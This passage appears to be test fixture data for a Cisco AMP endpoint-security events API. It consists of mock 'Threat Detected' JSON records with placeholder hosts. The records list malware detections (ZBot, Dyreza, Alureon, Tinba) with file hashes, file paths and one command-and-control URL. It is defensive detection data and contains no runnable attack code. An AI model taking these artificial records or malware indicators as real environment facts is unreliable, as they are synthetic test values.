a1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":810000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855180","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855179","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257087266357000,"timestamp":1610705393,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:09:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257087266357305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":469000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":344000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666793712517000,"timestamp":1610705390,"timestamp_nanoseconds":948000000,"date":"2021-01-15T10:09:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666793712517128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666785122583000,"timestamp":1610705388,"timestamp_nanoseconds":372000000,"date":"2021-01-15T10:09:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666785122582535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":596,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257040021717000,"timestamp":1610705382,"timestamp_nanoseconds":304000000,"date":"2021-01-15T10:09:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257040021717048","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256988482109000,"timestamp":1610705370,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:09:30+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256988482109495","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":782000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203910","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203909","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666694928269000,"timestamp":1610705367,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:09:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666694928269316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":2204,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256962712306000,"timestamp":1610705364,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:09:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256962712305718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617250006073000,"timestamp":1610705347,"timestamp_nanoseconds":296000000,"date":"2021-01-15T10:09:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617250006073346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":706000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053698","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://dak1otavola1ndos.com/h/index.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":222000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053697","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617228531237000,"timestamp":1610705342,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:09:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617228531236865","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\My Documents\\Downloads\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415396303000800,"timestamp":1610705341,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Tinba.15hl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705341,"start_date":"2021-01-15T10:09:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"bin.exe","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\Application Data\\default\\bin.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49","sha1":"194ada957926b985653f0400ede75175df6b48be","md5":"c141be7ef8a49c2e8bda5e4a856386ac"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":503000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086401","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Tinba.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Tinba.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256842453221000,"timestamp":1610705336,"timestamp_nanoseconds":643000000,"date":"2021-01-15T10:08:56+00:00","event_type":"Threat 